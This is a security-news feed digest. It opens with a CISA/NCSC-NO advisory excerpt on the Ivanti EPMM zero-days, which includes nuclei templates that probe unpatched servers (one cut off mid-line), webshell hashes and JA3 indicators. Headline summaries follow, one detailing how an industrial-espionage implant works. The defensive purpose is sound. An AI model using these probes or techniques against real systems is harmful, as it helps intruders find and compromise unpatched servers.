                Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.

                CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.

                Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.

                This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt f

                Autosummary: EVIDENCE OF VULNERABILITY METHODS

                CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35078:

                    id: CVE-2023-35078-Exposure
                    info:
                      name: Ivanti EPMM Remote Unauthenticated API Access
                      author: JC
                      severity: critical
                      reference:
                        - https://nvd.nist.gov/vuln/detail/CVE-2023-35078
                      tags: ivanti, mobileiron, epmm, auth-bypass
                    requests:
                      - method: GET
                        path:
                          - "{{RootURL}}/mifs/aad/api/v2/ping"
                        matchers-condition: and
                        matchers:
                          - type: status
                            status:
                              - 200
                          - type: word
                            part: body
                            words:
                              - "vspVersion"
                              - "apiVersion"
                            condition: and

                CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:

                    id: CVE-2023-35081
                    info:
                      name: Ivanti EPMM Remote Arbitrary File Write
                      author: JC
                      severity: High
                      reference:
                        - https://nvd.nist.gov/vuln/detail/CVE-2023-35081
                      description: Identifies vulnerable unpatched versions of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10.0.3, 11.9.1.2, and 11.8.1.2 that allows an authenticated administrator to perform arbitrary file writes to the EPMM server.
                      tags: ivanti, mobileiron, epmm
                    requests:
                      - method: GET
                        path:
                          - "{{RootURL}}/mifs/c/windows/api/v2/device/registration"
                        matchers-condition: and
                        matchers:
                          - type: status
                            status:
                              - 200
                          - type: regex
                            part: all
                            regex:
                              - ".*\?VSP

                NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):
                Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
                Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0
                Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0

                NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):
                Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)

                NCSC-NO observed the following user agents communicating with Exchange webshell:

                APPENDIX: INDICATORS OF COMPROMISE
                NCSC-NO observed the following webshell hash: c0b42bbd06d6e25dfe8faebd735944714b421388
                NCSC-NO observed the following hash of mi.war: 1cd358d28b626b7a23b9fd4944e29077c265db46
                NCSC-NO observed the following JA3 hashes used against MobileIron Core: 2d5bd942ebf308df61e1572861d146f6 473cd7cb9faa642487833865d516e578 579ccef312d18482fc42e2b822ca2430 849d3331f3e07a0797a02f12a6a82aa9 8d9f7747675e24454cd9b7ed35c58707 ad55557b7cbd735c2627f7ebb3b3d493

                CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and: Perform arbitrary Lightweight Directory Access Protocol (LDAP) queries against the Active Directory (AD).

                Overview: In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network.


                Warning over medical clinics using fake Google reviews

                industry
                2023-08-01 https://www.bbc.co.uk/news/technology-66329833?at_medium=RSS&at_campaign=KARANGA
                The BBC tracked down UK companies using fake reviews to boost their visibility in Google results. "

                Autosummary: "


                Etsy sellers call for strike after money held

                financial
                2023-08-01 https://www.bbc.co.uk/news/business-66362229?at_medium=RSS&at_campaign=KARANGA
                Sellers on the online marketplace are calling for action in protest at its reserve system. "

                Autosummary: "


                Relying on CVSS alone is risky for vulnerability management

                exploits
                2023-07-31 https://www.helpnetsecurity.com/2023/07/31/cvss-vulnerability-strategy/

                A vulnerability management strategy that relies solely on CVSS for vulnerability prioritization is proving to be insufficient at best, according to Rezilion. In fact, relying solely on a CVSS severity score to assess the risk of individual vulnerabilities was shown to be equivalent to randomly selecting vulnerabilities for remediation. Additional context is required in order to allow for a more scalable and effective prioritization strategy. This context should stem from internal sources — aka the … More

                The post Relying on CVSS alone is risky for vulnerability management appeared first on Help Net Security.

                "

                Autosummary: A patching strategy that considers CVSS, internal environment context (such as reachability analysis, asset criticality, and provenance), and additional threat intelligence sources such as CISA KEV combined with EPSS, can assist organizations in making informed, risk-based vulnerability management decisions and improve the overall security posture of their organization. "


                The race against time in ransomware attacks

                exploits ransomware
                2023-07-31 https://www.helpnetsecurity.com/2023/07/31/ransomware-business-data-risk/

                Most organizations lack strong cyber resilience strategies or data security capabilities to address threats and maintain business continuity, according to BigID. Despite both the rise in threats and the high percentage of respondents whose organizations suffered recent attacks, there hasn’t been a corresponding uptick in strategic measures to shore up cyber resilience. In fact, close to four in five survey respondents don’t have complete confidence that their company has a cyber resilience strategy designed to … More

                The post The race against time in ransomware attacks appeared first on Help Net Security.

                "

                Autosummary: When an organization gets hit by ransomware, and data is stolen, wiped, infected, or otherwise compromised, that organization can’t properly function until its data, processes, operations, and applications are restored. "


                Web browsing is the primary entry vector for ransomware infections

                exploits ransomware
                2023-07-31 https://www.helpnetsecurity.com/2023/07/31/ransomware-delivery-2022/

                The most widely used method for ransomware delivery in 2022 was via URL or web browsing (75.5%), Palo Alto Networks researchers have found. In 2021, it was email attachments (i.e., delivery via SMTP, POP3, and IMAP protocols), but in 2022 that particular delivery channel was used only in 12% of attempts. Ransomware delivery vectors in 2022 (Source: Palo Alto Networks) “Ransomware binaries are often delivered from compromised websites, which should serve as a reminder for … More

                The post Web browsing is the primary entry vector for ransomware infections appeared first on Help Net Security.

                "

                Autosummary: "


                Fruity Trojan Uses Deceptive Software Installers to Spread Remcos RAT

                exploits
                2023-07-31 https://thehackernews.com/2023/07/fruity-trojan-uses-deceptive-software.html
                Threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity, with the goal of installing remote access trojans like Remcos RAT. "Among the software in question are various instruments for fine-tuning CPUs, graphic cards, and BIOS; PC hardware-monitoring tools; and some other apps," cybersecurity "

                Autosummary: The installer, besides activating the standard installation process, stealthily drops the Fruity trojan, a Python-based malware that unpacks an MP3 file ("Idea.mp3") to load an image file ("Fruit.png") to activate the multi-stage infection. "


                Hackers exploit BleedingPipe RCE to target Minecraft servers, players

                exploits
                2023-07-31 https://www.bleepingcomputer.com/news/security/hackers-exploit-bleedingpipe-rce-to-target-minecraft-servers-players/
                Hackers are actively exploiting a "BleedingPipe" remote code execution vulnerability in Minecraft mods to run malicious commands on servers and clients, allowing them to take control of the devices. [...] "

                Autosummary: After further research, the MMPA has found that the BleedingPipe vulnerability is also present in the following Minecraft mods:
                EnderCore
                LogisticsPipes versions older than 0.10.0.71
                BDLib 1.7 through 1.12
                Smart Moving 1.12
                Brazier
                DankNull
                Gadomancy
                Advent of Ascension (Nevermine) version 1.12.2
                Astral Sorcery versions 1.9.1 and older
                EnderCore versions below 1.12.2-0.5.77
                JourneyMap versions below 1.16.5-5.7.2
                Minecraft Comes Alive (MCA) versions 1.5.2 through 1.6.4
                RebornCore versions below 4.7.3
                Thaumic Tinkerer versions below 2.3-138
                However, it is essential to note that the above list isn't complete, and BleedingPipe potentially impacts many more mods. "


                Ivanti fixes second zero-day exploited by attackers (CVE-2023-35081)

                exploits
                2023-07-31 https://www.helpnetsecurity.com/2023/07/31/cve-2023-35081/

                Another actively exploited zero-day vulnerability (CVE-2023-35081) affecting Ivanti Endpoint Manager Mobile (EPMM) has been identified and fixed. The first zero-day spotted: Last week, we reported on a remote unauthenticated API access vulnerability (CVE-2023-35078) affecting Ivanti EPMM having been exploited to target Norwegian ministries. The company stated that the vulnerability has impacted a limited number of customers and has released a patch, but did not share any other details or indicators of compromise with the public. … More

                The post Ivanti fixes second zero-day exploited by attackers (CVE-2023-35081) appeared first on Help Net Security.

                "

                Autosummary: About CVE-2023-35081: CVE-2023-35081, discovered with the help of Mnemonic researchers, is a remote arbitrary file write vulnerability that could allow a threat actor to remotely create, modify, or delete files in the Ivanti EPMM server. "


                Common TTPs of attacks against industrial organizations. Implants for gathering data

                industry
                2023-07-31 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-gathering-data/
                This part of the research is devoted to second stage malware used to gather data on infected systems of industrial organizations. "

                Autosummary: --2, it restarts itself with parameter --1, it restarts itself with parameter
                When run with parameter --1, it starts the “msiexec.exe” process, reads and decrypts the payload, and injects it into the memory of the “msiexec.exe” process. Once the payload starts executing in the memory of “msiexec.exe”, it runs an endless loop consisting of 6 simple steps:
                1. Create folders for file storage (if they do not exist) and find the path to “WinRar.exe”
                2. Decrypt strings
                3. Read config and start searching for files on all disks
                4. Copy files and write log
                5. Archive copied files and clean up
                6. Sleep for 10 minutes
                (Figure: Main loop of the implant designed to collect local files)
                First, the implant creates the folder “C:\ProgramData\NetWorks”, then it creates one subfolder for temporary file storage (“C:\ProgramData\NetWorks\fl”) and one subfolder for archived data storage (“C:\ProgramData\NetWorks\ZZ”). The implant also checks “%TEMP%\TCABC8.tmp” for the following files that are used to infect a removable drive whose serial number matches the name of the folder:
                “mcods.exe”, which is a legitimate McAfee executable vulnerable to DLL hijacking
                “McVsoCfg.dll”, which is the second-step payload
                “DOC”, “PDF” or “DIR” files, which define the lure link file to be used
                It is obvious that the presence of the files mentioned above in the folder assigned to a specific removable drive indicates that the attackers first analyze the contents of removable drives for some time and only then copy the files used to infect a specific removable drive to the folder specified.
                Dedicated implant for gathering local files (MD5)
                Stack of implants used to exfiltrate data from air-gapped networks (MD5)
                Appendix II – MITRE ATT&CK Mapping
                (Figure: File structure of a temp folder on an infected host and an infected removable drive)
                Then, depending on the config and the extension (“DOC”, “PDF”, or “DIR”) of the file found in the temp directory, the main module recursively searches the drive’s root path for either a file (with the extension “.docx” or “.pdf”) or a folder.
                (Figure: Fragment of the second-step worm, “McVsoCfg.dll” – removing itself from the infected drive)
                Step 3: The third-step implant, “msgui.exe”, is quite small and simple – it is designed to execute a batch script with “cmd.exe” to collect data and save the output to the drive’s “$RECYCLE.BIN” folder so that it can be collected by the main module of the malware (when connected to the originally infected host).
                (Figure: Fragment of the “msgui.exe” implant’s CMD commands used to gather information)
                (Figure: Fragment of the third-step malware, “msgui.exe”, designed to collect host info and run fourth-step malware (if it exists))
                Step 4: The fourth-step malware consists of two files: A simple dropper of the payload (similar to that used by second-step malware) Depending on their settings, both modules may collect information about a drive, as well as capture screenshots and window titles on the infected host, search for and copy documents (.doc, .docx, .xls, .xlsx, .ppt, .pptx) and images (.png, .jpeg, .jpg, .bmp). "


                Peru: Indigenous women and police clash in anti-government protest

                latam government
                2023-07-31 https://www.bbc.co.uk/news/world-latin-america-66357011?at_medium=RSS&at_campaign=KARANGA
                At least 60 people have died in anti-government protests since December last year. "

                Autosummary: "


                Week in review: Ivanti zero-day exploited, MikroTik vulnerability could compromise 900,000 routers

                exploits
                2023-07-30 https://www.helpnetsecurity.com/2023/07/30/week-in-review-ivanti-zero-day-exploited-mikrotik-vulnerability-could-compromise-900000-routers/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Key factors for effective security automation In this Help Net Security interview, Oliver Rochford, Chief Futurist at Tenzir, discusses how automation can be strategically integrated with human expertise, the challenges in ensuring data integrity, and the considerations when automating advanced tasks. Overcoming the cybersecurity talent shortage with upskilling initiatives In this Help Net Security interview, Dr. Lindsey Polley de Lopez, … More

                The post Week in review: Ivanti zero-day exploited, MikroTik vulnerability could compromise 900,000 routers appeared first on Help Net Security.

                "

                Autosummary: US companies commit to safe, transparent AI development Seven US artificial intelligence (AI) giants – Amazon, Anthropic, Google, Inflection, Meta, Microsoft, and OpenAI – have publicly committed to “help move toward safe, secure, and transparent development of AI technology.” "


                Israel's largest oil refinery website offline amid cyber attack claims

                industry
                2023-07-30 https://www.bleepingcomputer.com/news/security/israels-largest-oil-refinery-website-offline-amid-cyber-attack-claims/
                The website of Israel's largest oil refinery operator, BAZAN Group, is inaccessible from most parts of the world as threat actors claim to have hacked the Group's cyber systems. [...] "

                Autosummary: (Figure: Bazan Group website shows an "Access Denied" error message. Source: BleepingComputer) Cyber Avengers claims responsibility: In a Telegram channel, Iranian hacktivist group "Cyber Avengers" aka "CyberAv3ngers" has claimed responsibility for breaching BAZAN's network. "


                Google: Android patch gap makes n-days as dangerous as zero-days

                exploits
                2023-07-30 https://www.bleepingcomputer.com/news/security/google-android-patch-gap-makes-n-days-as-dangerous-as-zero-days/
                Google has published its annual 0-day vulnerability report, presenting in-the-wild exploitation stats from 2022 and highlighting a long-standing problem in the Android platform that elevates the value and use of disclosed flaws for extended periods. [...] "

                Autosummary: N-days as effective as 0-days: In 2022, many issues of this kind impacted Android, most notably CVE-2022-38181, a vulnerability in the ARM Mali GPU. "


                Israel's largest oil refinery website offline after DDoS attack

                industry
                2023-07-30 https://www.bleepingcomputer.com/news/security/israels-largest-oil-refinery-website-offline-after-ddos-attack/
                The website of Israel's largest oil refinery operator, BAZAN Group, is inaccessible from most parts of the world as threat actors claim to have hacked the Group's cyber systems. [...] "

                Autosummary: These included diagrams of "Flare Gas Recovery Unit," "Amine Regeneration" system, a petrochemical "Splitter Section," and PLC code, as seen by BleepingComputer. "


                Ivanti Warns of Another Endpoint Manager Mobile Vulnerability Under Active Attack

                exploits
                2023-07-29 https://thehackernews.com/2023/07/ivanti-warns-of-another-endpoint.html
                Ivanti has disclosed yet another security flaw impacting Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core, that it said has been weaponized as part of an exploit chain by malicious actors in the wild. The new vulnerability, tracked as CVE-2023-35081 (CVSS score: 7.8), impacts supported versions 11.10, 11.9, and 11.8, as well as those that are currently end-of-life (EoL). "

                Autosummary: The new vulnerability, tracked as CVE-2023-35081 (CVSS score: 7.8), impacts supported versions 11.10, 11.9, and 11.8, as well as those that are currently end-of-life (EoL). "


                New Android Malware CherryBlos Utilizing OCR to Steal Sensitive Data

                exploits
                2023-07-29 https://thehackernews.com/2023/07/new-android-malware-cherryblos.html
                A new Android malware strain called CherryBlos has been observed making use of optical character recognition (OCR) techniques to gather sensitive data stored in pictures. CherryBlos, per Trend Micro, is distributed via bogus posts on social media platforms and comes with capabilities to steal cryptocurrency wallet-related credentials and act as a clipper to substitute wallet addresses when a "

                Autosummary: "Some of the users (operators) have multiple devices connected to their account, with some having as much as 30 devices they've been watching over a course of multiple years, spying on everyone in their lives," a security researcher, who goes by the name maia arson crimew, said. "


                Linux version of Abyss Locker ransomware targets VMware ESXi servers

                exploits ransomware
                2023-07-29 https://www.bleepingcomputer.com/news/security/linux-version-of-abyss-locker-ransomware-targets-vmware-esxi-servers/
                The Abyss Locker operation is the latest to develop a Linux encryptor to target VMware's ESXi virtual machines platform in attacks on the enterprise. [...] "

                Autosummary: Other ransomware operations that utilize Linux ransomware encryptors, with most targeting VMware ESXi, include Akira, Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, and Hive. "


                The Chilean band speaking out against police violence

                latam
                2023-07-29 https://www.bbc.co.uk/news/world-latin-america-66312426?at_medium=RSS&at_campaign=KARANGA
                All of the band's musicians were left partially or totally blinded by projectiles fired by police. "

                Autosummary: "


                Cybersecurity Agencies Warn Against IDOR Bugs Exploited for Data Breaches

                financial exploits ciber
                2023-07-28 https://thehackernews.com/2023/07/cybersecurity-agencies-warn-against.html
                Cybersecurity agencies in Australia and the U.S. have published a joint cybersecurity advisory warning against security flaws in web applications that could be exploited by malicious actors to orchestrate data breach incidents and steal confidential data. This includes a specific class of bugs called Insecure Direct Object Reference (IDOR), a type of access control flaw that occurs when an "

                Autosummary: The study found that "Valid Accounts were the most common successful attack technique, responsible for 54% of successful attempts," followed by spear-phishing links (33.8%), spear-phishing attachments (3.3%), external remote services (2.9%), and drive-by compromises (1.9%). "


                New Android malware uses OCR to steal credentials from images

                exploits
                2023-07-28 https://www.bleepingcomputer.com/news/security/new-android-malware-uses-ocr-to-steal-credentials-from-images/
                Two new Android malware families named "CherryBlos" and "FakeTrade" were discovered on Google Play, aiming to steal cryptocurrency credentials and funds or conduct scams. [...] "

                Autosummary: (Figure: YouTube video promoting a CherryBlos carrier app. Source: Trend Micro) The names used for the malicious APKs are GPTalk, Happy Miner, Robot999, and SynthNet, downloaded from the following websites with matching domain names: chatgptc[.]io, happyminer[.]com, robot999[.]net, synthnet[.]ai. A malicious Synthnet app was also uploaded onto the Google Play store, where it was downloaded roughly a thousand times before being reported and removed. "


                Hawai'i Community College pays ransomware gang to prevent data leak

                exploits ransomware
                2023-07-28 https://www.bleepingcomputer.com/news/security/hawaii-community-college-pays-ransomware-gang-to-prevent-data-leak/
                The Hawaiʻi Community College has admitted that it paid a ransom to ransomware actors to prevent the leaking of stolen data of approximately 28,000 people. [...] "

                Autosummary: Meanwhile, the restoration of the damaged IT infrastructure is still underway, likely now supported by a decryption key provided by NoEscape, and is expected to be completed by August 14th, 2023. "


                IcedID Malware Adapts and Expands Threat with Updated BackConnect Module

                exploits
                2023-07-28 https://thehackernews.com/2023/07/icedid-malware-adapts-and-expands.html
                The threat actors linked to the malware loader known as IcedID have made updates to the BackConnect (BC) module that's used for post-compromise activity on hacked systems, new findings from Team Cymru reveal. IcedID, also called BokBot, is a strain of malware similar to Emotet and QakBot that started off as a banking trojan in 2017, before switching to the role of an initial access facilitator "

                Autosummary: "In examining management infrastructure associated with IcedID BC, we are also able to discern a pattern of multiple distinct accesses from users we assess to be both associated with the day to day operations of IcedID, and their affiliates who interact with victim hosts post-compromise," Team Cymru said. "


                Hackers Abusing Windows Search Feature to Install Remote Access Trojans

                exploits
                2023-07-28 https://thehackernews.com/2023/07/hackers-abusing-windows-search-feature.html
                A legitimate Windows search feature is being exploited by malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The novel attack technique, per Trellix, takes advantage of the "search-ms:" URI protocol handler, which offers the ability for applications and HTML links to launch custom local "

                Autosummary: The novel attack technique, per Trellix, takes advantage of the "search-ms:" URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the "search:" application protocol, a mechanism for calling the desktop search application on Windows. "


                Ivanti patches new zero-day exploited in Norwegian govt attacks

                exploits
                2023-07-28 https://www.bleepingcomputer.com/news/security/ivanti-patches-new-zero-day-exploited-in-norwegian-govt-attacks/
                Ivanti has fixed another vulnerability in the Endpoint Manager Mobile software (formerly MobileIron Core), exploited as a zero-day to breach the IT systems of a dozen ministries in Norway. [...] "

                Autosummary: CVE-2023-35078 was also exploited in the same attacks targeting Norwegian government entities as a zero-day, to steal personally identifiable information (PII), including names, phone numbers, and other mobile device details. "


                CISA: New Submarine malware found on hacked Barracuda ESG appliances

                exploits
                2023-07-28 https://www.bleepingcomputer.com/news/security/cisa-new-submarine-malware-found-on-hacked-barracuda-esg-appliances/
                CISA says new malware known as Submarine was used to backdoor Barracuda ESG (Email Security Gateway) appliances on federal agencies' networks by exploiting a now-patched zero-day bug. [...] "

                Autosummary: Unknown backdoor found on hacked ESG appliances: On Friday, CISA revealed that another new malware strain known as Submarine—and also tracked by Mandiant as DepthCharge—was found on the compromised appliances, a multi-component backdoor used for detection evasion, persistence, and data harvesting. "


                The Week in Ransomware - July 28th 2023 - New extortion tactics

                exploits ransomware industry
                2023-07-28 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-28th-2023-new-extortion-tactics/
                With ransom payments declining, ransomware gangs are evolving their extortion tactics to utilize new methods to pressure victims. [...] "

                Autosummary: Finally, we learned more about some recent attacks: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @malwareforme, @BleepinComputer, @LawrenceAbrams, @demonslay335, @struppigel, @DanielGallagher, @malwrhunterteam, @VK_Intel, @serghei, @fwosar, @Ionut_Ilascu, @FourOctets, @jorntvdw, @PolarToffee, @jgreigj, @BrettCallow, @SophosXOps, @eSentire, @vxunderground, @AlvieriD, and @pcrisk. "


                Zimbra issues awaited patch for actively exploited vulnerability

                exploits
                2023-07-28 https://www.malwarebytes.com/blog/news/2023/07/zimbra-issues-awaited-patch-for-actively-exploited-vulnerability

                Categories: Exploits and vulnerabilities, News

                Tags: Zimbra, ZCS, CVE-2023-38750, CISA, CVE-2023-0464, TAG, XSS, JSP, XML

                Zimbra has released ZCS 10.0.2 that fixes two security issues, including the known bug that could lead to exposure of internal JSP and XML files.


                The post Zimbra issues awaited patch for actively exploited vulnerability appeared first on Malwarebytes Labs.

                "

                Autosummary: The Zimbra workaround suggests you apply the following fix manually on all of your mailbox nodes:
                1. Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto
                2. Open the active file for editing and go to line number 40
                3. Change <input name="st" type="hidden" value="${param.st}"/> to <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>
                Zimbra notes that a service restart is not required, so you can apply the manual workaround without any downtime. "


                Cryptojacking soars as cyberattacks increase, diversify

                ciber
                2023-07-27 https://www.helpnetsecurity.com/2023/07/27/cryptojacking-attacks-rise/

                Digital threat actors are adopting evolving tactical behaviors, opting for different types of malicious attacks compared to previous years, according to SonicWall. Overall intrusion attempts were up, led by the highest year on record for global cryptojacking volume recorded by SonicWall, as threat actors shifted away from traditional ransomware attacks in favor of a stealthier means of malicious activities. The data suggests increased law enforcement activity, heavy sanctions and victims’ refusal to pay ransom demands … More

                The post Cryptojacking soars as cyberattacks increase, diversify appeared first on Help Net Security.

                "

                Autosummary: Despite the decline in global ransomware attempts (-41%), a variety of other attacks have trended up globally, including cryptojacking (+399%), IoT malware (+37%) and encrypted threats (+22%). SonicWall identified a total of 172,146 never-before-seen malware variants in the first half of 2023, which is down (-36%) year-over-year, suggesting bad actors are spending less time on research and development, and more time on volume-based attacks – utilising open-source tools that may be less likely to be intercepted. "


                Group-IB Co-Founder Sentenced to 14 Years in Russian Prison for Alleged High Treason

                rusia-ucrania
                2023-07-27 https://thehackernews.com/2023/07/group-ib-co-founder-sentenced-to-14.html
                A city court in Moscow on Wednesday convicted Group-IB co-founder and CEO Ilya Sachkov of "high treason" and jailed him for 14 years in a "strict regime colony" over accusations of passing information to foreign spies. "The court found Sachkov guilty under Article 275 of the Russian Criminal Code (high treason) sentencing him to 14 years of incarceration in a maximum-security jail, restriction "

                Autosummary: "


                8 million people hit by data breach at US govt contractor Maximus

                financial
                2023-07-27 https://www.bleepingcomputer.com/news/security/8-million-people-hit-by-data-breach-at-us-govt-contractor-maximus/
                U.S. government services contractor Maximus has disclosed a data breach warning that hackers stole the personal data of 8 to 11 million people during the recent MOVEit Transfer data-theft attacks. [...] "

                Autosummary: "Based on the review of impacted files to date, [Maximus] believes those files contain personal information, including social security numbers, protected health information and/or other personal information, of at least 8 to 11 million individuals to whom the company anticipates providing notice of the incident," reads the SEC 8-K filing. "


                SEC requires firms to report cyberattacks within 4 days, but not everyone may like it

                ciber
                2023-07-27 https://www.tripwire.com/state-of-security/sec-requires-reporting-cyberattacks-within-4-days-not-everyone-may-it
                New rules requiring publicly-listed firms to disclose serious cybersecurity incidents within four days have been adopted by the US Securities and Exchange Commission (SEC). The tough new rules, although undoubtedly well-intentioned, are likely to leave some firms angry that they are being "micromanaged" and - it is argued - could even assist attackers. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: From December 2023, listed firms are required to report details about "material" cyberattacks describing "the incident's nature, scope, and timing, as well as its material impact or reasonably likely material impact on the registrant."


                New Malvertising Campaign Distributing Trojanized IT Tools via Google and Bing Search Ads

                exploits
                2023-07-27 https://thehackernews.com/2023/07/new-malvertising-campaign-distributing.html
                A new malvertising campaign has been observed leveraging ads on Google Search and Bing to target users seeking IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP, and trick them into downloading trojanized installers with an aim to breach enterprise networks and likely carry out future ransomware attacks. Dubbed Nitrogen, the "opportunistic" activity is designed to deploy second-stage

                Autosummary: To make matters worse, Sophos said it found on prominent criminal marketplaces a "significant number of advertisements for, and discussion about, SEO poisoning, malvertising, and related services" as well as sellers offering compromised Google Ads accounts.


                Zimbra patches zero-day vulnerability exploited in XSS attacks

                exploits
                2023-07-27 https://www.bleepingcomputer.com/news/security/zimbra-patches-zero-day-vulnerability-exploited-in-xss-attacks/
                Two weeks after the initial disclosure, Zimbra has released security updates that patch a zero-day vulnerability exploited in attacks targeting Zimbra Collaboration Suite (ZCS) email servers. [...]



                Heart monitor manufacturer hit by cyberattack, takes systems offline

                industry ciber
                2023-07-27 https://www.bitdefender.com/blog/hotforsecurity/heart-monitor-manufacturer-hit-by-cyberattack-takes-systems-offline/
                CardioComm, a Canadian company which provides heart-monitoring technology to hospitals and consumers, has revealed that it has been forced to take its systems offline following a cyberattack. Read more in my article on the Hot for Security blog.



                BreachForums database and private chats for sale in hacker data breach

                financial
                2023-07-27 https://www.bleepingcomputer.com/news/security/breachforums-database-and-private-chats-for-sale-in-hacker-data-breach/
                While consumers are usually the ones worried about their information being exposed in data breaches, it's now the hacker's turn, as the notorious Breached cybercrime forum's database is up for sale and member data shared with Have I Been Pwned. [...]

                Autosummary: Breached was a large hacking and data leak forum notorious for hosting, leaking, and selling data stolen from hacked companies, governments, and organizations worldwide. Breached and its members have been responsible for a wide range of hacks, extortion attempts, ransomware attacks, and the leaking of stolen data for many companies.


                Patch now! Ivanti Endpoint Manager Mobile Authentication vulnerability used in the wild

                exploits
                2023-07-27 https://www.malwarebytes.com/blog/news/2023/07/patch-now-ivanti-endpoint-manager-mobile-authentication-vulnerability-used-in-the-wild

                A patch is now available for an Ivanti EPMM vulnerability that was used in a cyberattack on the ICT platform which is relied upon by a dozen Norwegian ministries.

                The post Patch now! Ivanti Endpoint Manager Mobile Authentication vulnerability used in the wild appeared first on Malwarebytes Labs.


                Autosummary: The CVE assigned to this vulnerability is: CVE-2023-35078 (CVSS score 10 out of 10): Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, allows remote attackers to obtain Personally Identifiable Information (PII), add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild.


                Overcoming the cybersecurity talent shortage with upskilling initiatives

                ciber
                2023-07-26 https://www.helpnetsecurity.com/2023/07/26/lindsey-polley-de-lopez-cybersecurity-upskilling-initiatives/

                In this Help Net Security interview, Dr. Lindsey Polley de Lopez, Director of Cyber & Space Intelligence at MACH37, proposes strategies for companies, educational institutions, and governments on how to address the ongoing shortage of cybersecurity talent through the introduction of upskilling initiatives. She also discusses creating a more diverse and inclusive talent pool capable of addressing complex problems in unconventional ways due to differing experiences. We hear a lot about the need for upskilling …



                Autosummary: And for government employees, federal contractors, and US military service members, check out the Department of Homeland Security's (DHS) FedVTE Program (which offers free online courses on topics such as ethical hacking and surveillance, risk management and malware analysis), as well as the USO & Skillsoft Partnership (which offers active duty members, spouses, and veterans unlimited access to a library of training and certification tools; sign-up via the USO Pathfinder Transition Program). At the federal level, the Cybersecurity and Infrastructure Security Agency (CISA) has a "Cybersecurity Workforce Training Guide" that helps early-career professionals plan a career pathway in cybersecurity, as well as a Cybersecurity Education and Training Assistance Program (CETAP) that helps teachers bring cybersecurity education into K–12 classrooms by providing worksheets, lesson plans, and notes that cover foundational concepts. When looking at the commercial sector, there are far too many initiatives to list, but a few key ones to be aware of include Microsoft's national upskilling campaign (which includes free curriculum for community colleges – as well as free training for their professors – and Microsoft's Cybersecurity Scholarship Program), the new Cyber Million Program launched this month by Accenture and Immersive Labs (which aims to fill 1 million entry-level cybersecurity jobs by offering free online courses), and free cybersecurity courses provided through Palo Alto Network's Beacon platform. There are many efforts worldwide, including WOMCY (a nonprofit focused on growing opportunity for women in cybersecurity in Latin America), Women4Cyber (a foundation working to promote and support the participation of women in cybersecurity in Europe), Women in Cyber Mentorship Program (a program under the United Nations International … When it comes to the consequences of the cybersecurity labor shortage, how does it impact company growth?


                Critical MikroTik RouterOS Vulnerability Exposes Over Half a Million Devices to Hacking

                exploits
                2023-07-26 https://thehackernews.com/2023/07/critical-mikrotik-routeros.html
                A severe privilege escalation issue impacting MikroTik RouterOS could be weaponized by remote malicious actors to execute arbitrary code and seize full control of vulnerable devices. Cataloged as CVE-2023-30799 (CVSS score: 9.1), the shortcoming is expected to put approximately 500,000 and 900,000 RouterOS systems at risk of exploitation via their web and/or Winbox interfaces, respectively,

                Autosummary: The security hole, however, was not plugged until October 13, 2022, in the RouterOS stable version 6.49.7 and on July 19, 2023, for the RouterOS Long-term version 6.49.8.


                Microsoft fixes bug that broke video recording in Windows apps

                exploits
